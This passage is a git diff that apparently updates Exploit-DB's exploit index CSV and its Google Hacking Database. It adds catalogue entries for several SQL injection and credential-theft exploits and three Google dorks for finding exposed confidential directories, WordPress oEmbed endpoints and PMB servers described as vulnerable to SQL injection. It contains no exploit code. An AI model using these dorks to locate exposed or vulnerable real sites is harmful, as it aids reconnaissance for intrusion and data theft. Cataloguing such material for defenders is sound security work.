Authenticated (Subscriber+) Plugin Setting Reset",2024-02-26,"Diaa Hanna",webapps,php,,2024-02-26,2024-02-26,0,,,,,, 26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,webapps,php,,2005-11-23,2013-07-03,1,,,,,,https://www.securityfocus.com/bid/15552/info 33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-11,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38184/info 36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49296/info @@ -24905,6 +24912,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,,2020-07-07,2020-07-07,0,,,,,, 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,, 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,, +51811,exploits/php/webapps/51811.txt,"Online Shopping System Advanced - Sql Injection",2024-02-26,"Furkan Gedik",webapps,php,,2024-02-26,2024-02-26,0,,,,,, 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,, 51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,, 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info @@ -30546,6 +30554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990 +51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,, 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,, 51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,, 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,, @@ -46237,6 +46246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,"Buffer Overflow",,,http://www.exploit-db.comCloudMe_1112.exe, 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,,2018-05-28,2018-05-28,0,,,,,, 44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64,,2018-03-12,2018-03-12,0,CVE-2018-7756,,,,, +51817,exploits/windows_x86-64/remote/51817.txt,"IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft",2024-02-26,hyp3rlinx,remote,windows_x86-64,,2024-02-26,2024-02-26,0,CVE-2024-22318,,,,, 42354,exploits/windows_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,windows_x86-64,,2017-07-24,2017-07-26,0,CVE-2017-0059;CVE-2017-0037,,,,,https://redr2e.com/cve-to-exploit-cve-2017-0037-and-0059/ 42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445,2017-05-19,2019-03-28,1,CVE-2017-0144,,EternalBlue,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2018-09-30-at-103641.png,,https://github.com/worawit/MS17-010/blob/873c5453680a0785415990379a4b36ba61f82a4d/eternalblue_exploit8.py 41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,,2017-05-10,2018-10-17,0,CVE-2017-0148;CVE-2017-0147;CVE-2017-0146;CVE-2017-0145;CVE-2017-0144;CVE-2017-0143,,,,, diff --git a/ghdb.xml b/ghdb.xml index 9c214f1cfd..0f74431271 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -41760,6 +41760,21 @@ Sagar Banwa 2023-02-27 Sanu Jose M + + 8420 + https://www.exploit-db.com/ghdb/8420 + Files Containing Juicy Info + intitle:"Index of /confidential" + Description-* intitle:"Index of /confidential"* +This google dork searches in the title of websites for the ""Index of +/confidential" + + intitle:"Index of /confidential" + https://www.google.com/search?q=intitle:"Index of /confidential" + + 2024-02-26 + Gautam Rawat + 8039 https://www.exploit-db.com/ghdb/8039 @@ -51560,6 +51575,27 @@ Dxtroyer 2023-11-20 Sathish Kishore + + 8418 + https://www.exploit-db.com/ghdb/8418 + Files Containing Juicy Info + inurl:"/wp-json/oembed/1.0/embed?url=" + Google Dork: +inurl:"/wp-json/oembed/1.0/embed?url=" + +Description: +Using this Google dork can help identify WordPress sites that have their +oEmbed API publicly accessible, which could potentially be useful for +various purposes such as content scraping, data analysis, or security +research. However, it's essential to use this information ethically and +responsibly, respecting the privacy and security of the websites you +interact with. + inurl:"/wp-json/oembed/1.0/embed?url=" + https://www.google.com/search?q=inurl:"/wp-json/oembed/1.0/embed?url=" + + 2024-02-26 + Jeel Patel + 4678 https://www.exploit-db.com/ghdb/4678 @@ -116029,6 +116065,23 @@ Ahmad Al-Nounou 2014-05-05 anonymous + + 8419 + https://www.exploit-db.com/ghdb/8419 + Vulnerable Servers + "PMB" AND ("changelog.txt" OR inurl:opac_css) + The Dork Filters for PMB Services, Mostly vulnerable to SQli and handful of +CVEs + +*"PMB" AND ("changelog.txt" OR inurl:opac_css)* + + + "PMB" AND ("changelog.txt" OR inurl:opac_css) + https://www.google.com/search?q="PMB" AND ("changelog.txt" OR inurl:opac_css) + + 2024-02-26 + Wallehazz + 6161 https://www.exploit-db.com/ghdb/6161